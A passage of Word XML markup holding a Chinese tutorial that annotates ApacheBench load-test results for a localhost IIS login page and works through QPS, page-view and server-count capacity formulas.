          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//平台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00B050"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00B050"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00B050"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Server Software:        Microsoft-IIS/10.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//服务器主机名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Server Hostname:        localhost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//服务器端口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Server Port:            6356</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//测试的页面文档</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Document Path:          /Pages/redis/Login.aspx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//文档大小</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Document Length:        1287 bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//并发数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Concurrency Level:      100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//整个测试持续的时间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Time taken for tests:   1.641 seconds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//完成的请求数量</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 requests:      1000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//失败的请求数量</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Failed requests:        0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//整个场景中的网络传输量</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Total transferred:      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1699000 bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//整个场景中的HTML内容传输量</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTML transferred:       1287000 bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//大家最关心的指标之一，相当于 LR 中的 每秒事务数 ，后面括号中的 mean 表示这是一个平均值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最大吞吐量（QPS）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Requests per second:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">    609.38 [#/sec] (mean)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//大家最关心的指标之二，相当于 LR 中的 平均事务响应时间 ，后面括号中的 mean 表示这是一个平均值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>每个请求所需时间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Time per request: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">      164.100 [ms] (mean)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//每个请求实际运行时间的平均值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Time per request:       1.641 [ms] (mean, across all concurrent requests)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//平均每秒网络上的流量，可以帮助排除是否存在网络流量过大导致响应时间延长的问题</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Transfer rate:          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1011.08 [Kbytes/sec] received</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//网络上消耗的时间的分解，各项数据的具体算法还不是很清楚</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Connection Times (ms)</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min  mean[+/-sd] median   max</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Connect:        0    0   0.6      0       8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Processing:    47  156  44.4    138     340</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Waiting:       14  156  44.6    137     340</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Total:         47  157  44.4    138     340</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//整个场景中所有请求的响应情况。在场景中每个请求都有一个响应时间，其中50％的用户响应时间小于1093 毫秒，60％ 的用户响应时间小于1247 毫秒，最大的响应时间小于7785 毫秒</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Percentage of the requests served within a certain time (ms)</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50%    138</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66%    162</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75%    178</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80%    185</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90%    222</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95%    250</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98%    280</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99%    296</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100%    340 (longest request)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我们可以</w:t>
      </w:r>
      <w:r>
        <w:t>逐渐网上增加并发数，取Request per second的最大值作为Http server的性能指标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，拿到了QPS后，就可以计算PV(Page View)即页面访问量。这是衡量一个网站的重要指标。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单台服务器每天PV计算：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公式1：每天总PV=QPS * 3600 * 6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公式2：每天总PV=QPS * 3600 * 8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>峰值QPS和机器计算:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>原理：每天80%的访问集中在20%的时间里，这20%时间叫做峰值时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>公式：( 总PV数 * 80% ) / ( 每天秒数 * 20% ) = 峰值时间每秒请求数(QPS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>机器：峰值时间每秒QPS / 单台机器的QPS = 需要的机器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>服务器数量计算：服务器数量 =ceil( 每天总PV / 单台服务器每天总PV )</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>问：每天100w PV 的在单台机器上，这台机器需要多少QPS？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>答：( 1000000 * 0.8 ) / (86400 * 0.2 ) = 46 (QPS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>问：如果一台机器的QPS是18，需要几台机器来支持？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>答：46/ 18 = 3</w:t>
